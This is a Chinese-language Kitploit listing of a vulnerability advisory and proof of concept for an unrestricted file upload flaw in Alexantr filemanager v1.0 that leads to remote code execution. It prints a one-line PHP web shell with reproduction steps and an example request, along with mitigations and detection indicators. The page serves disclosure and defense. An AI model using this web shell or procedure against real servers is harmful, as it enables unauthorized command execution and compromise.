Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-37637 — Alexantr filemanager v1.0 中通过不受限制的文件上传实现远程代码执行 | Kitploit
工具/GitHubGitHub/slo-cyber-sec/cve-2026-37637
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发
GitHubslo-cyber-sec/cve-2026-37637

CVE-2026-37637

Alexantr filemanager v1.0 中通过不受限制的文件上传实现远程代码执行

查看仓库
13个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-37637

CVE-2026-37637 的概念验证 - Alexantr filemanager v1.0 中通过 filemanager.php 的不受限制文件上传导致的远程代码执行漏洞。

概述

CVE-2026-37637 是一个影响 Alexantr filemanager v1.0 的远程代码执行漏洞。

该漏洞存在于 filemanager.php 组件中,原因是上传文件的验证不足。远程攻击者可以将恶意 PHP 文件上传到 Web 可访问目录,并在服务器上执行任意命令。

CVE 状态:已提交至 MITRE
研究人员:CYBER-SEC 供应商仓库:https://github.com/alexantr/filemanager


漏洞摘要

项目描述
CVE IDCVE-2026-37637
漏洞类型远程代码执行
受影响产品Alexantr filemanager
受影响版本v1.0
易受攻击组件filemanager.php
攻击向量远程
是否需要认证取决于部署/配置
影响任意命令执行
根本原因不受限制的文件上传以及缺乏服务端文件验证

影响

攻击者可以通过文件上传功能上传恶意 PHP 文件。由于上传的文件存储在 Web 可访问的位置且允许 PHP 执行,攻击者可以在服务器上执行任意系统命令。

成功利用该漏洞可能允许攻击者:

  • 在服务器上执行任意命令
  • 读取敏感文件
  • 修改或删除应用程序文件
  • 上传其他恶意软件或 Web Shell
  • 进一步渗透托管环境
  • 完全控制受影响的服务器

技术细节

该应用程序允许用户上传任意文件,而未正确验证文件扩展名、MIME 类型或文件内容。

可以上传如下恶意 PHP 文件:

root@kitploit:~
<?php system($_GET['cmd']); ?>

一旦上传到 Web 可访问目录,攻击者即可通过浏览器访问该文件并通过 cmd 参数传递命令来执行命令。

示例:

root@kitploit:~
http://target/uploads/shell.php?cmd=id

这会导致在底层操作系统上执行命令。


复现步骤

1. 克隆易受攻击的应用程序

root@kitploit:~
git clone https://github.com/alexantr/filemanager
cd filemanager

2. 启动 PHP 开发服务器

root@kitploit:~
php -S localhost:8000

3. 访问应用程序

在浏览器中打开应用程序:

root@kitploit:~
http://localhost:8000/filemanager.php

根据部署或配置的不同,应用程序也可能通过以下地址访问:

root@kitploit:~
http://localhost:8000/pheditor.php

4. 上传恶意 PHP 文件

创建一个名为 shell.php 的文件:

root@kitploit:~
<?php system($_GET['cmd']); ?>

使用应用程序的上传功能上传该文件。

5. 执行命令

上传文件后,直接从浏览器访问它:

root@kitploit:~
http://localhost:8000/uploads/shell.php?cmd=id

如果利用成功,服务器将执行该命令并返回输出。

示例输出:

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

概念验证

恶意 PHP 载荷

root@kitploit:~
<?php system($_GET['cmd']); ?>

示例请求

root@kitploit:~
GET /uploads/shell.php?cmd=id HTTP/1.1
Host: target
User-Agent: Mozilla/5.0
Connection: close

预期结果

通过 cmd 参数提供的命令将在服务器上执行。


根本原因

该漏洞是由于文件上传功能中服务端验证不足造成的。

应用程序未正确限制:

  • 文件扩展名
  • MIME 类型
  • 文件内容
  • 上传目标位置
  • 上传目录内的执行权限

因此,可执行的 PHP 文件可以被上传并直接执行。


建议的修复措施

供应商和用户应实施以下防护措施。

1. 阻止危险文件扩展名

禁止上传可执行文件类型,例如:

root@kitploit:~
.php, .phtml, .php3, .php4, .php5, .phar

2. 使用白名单

仅允许预期的文件类型,例如:

root@kitploit:~
.jpg, .png, .gif, .txt, .pdf

3. 验证 MIME 类型和文件内容

不要仅依赖客户端提供的 Content-Type 标头。

文件验证应在服务端执行。

4. 将上传文件存储在 Web 根目录之外

上传的文件不应可直接执行或公开访问。

5. 禁用上传目录中的 PHP 执行

对于 Apache,可以通过 .htaccess 实现:

root@kitploit:~
php_flag engine off
RemoveHandler .php .phtml .php3 .php4 .php5 .phar
RemoveType .php .phtml .php3 .php4 .php5 .phar

对于 Nginx,阻止上传路径中的 PHP 处理:

root@kitploit:~
location /uploads/ {
    location ~ \.php$ {
        deny all;
    }
}

6. 重命名上传文件

使用服务器随机生成的文件名,并移除用户可控的扩展名。

7. 实施适当的访问控制

仅将上传功能限制为受信任的用户。


检测

管理员可以在 Web 可访问目录中查找可疑的上传 PHP 文件。

示例指标:

root@kitploit:~
shell.php
cmd.php
upload.php
backdoor.php
上传目录中的 .php 文件

可疑的请求模式可能包括:

root@kitploit:~
?cmd=
?exec=
?shell=
?command=

示例日志条目:

root@kitploit:~
GET /uploads/shell.php?cmd=id HTTP/1.1

免责声明

本仓库仅用于教育和防御性安全目的。

所提供的信息和概念验证旨在帮助开发人员、系统管理员和安全专业人员理解并修复该漏洞。

未经明确授权,请勿使用此信息攻击系统。未经授权访问计算机系统是违法的。

作者不对本仓库中提供信息的任何滥用行为负责。


参考

  • https://github.com/alexantr/filemanager
  • https://cve.mitre.org/
下载工具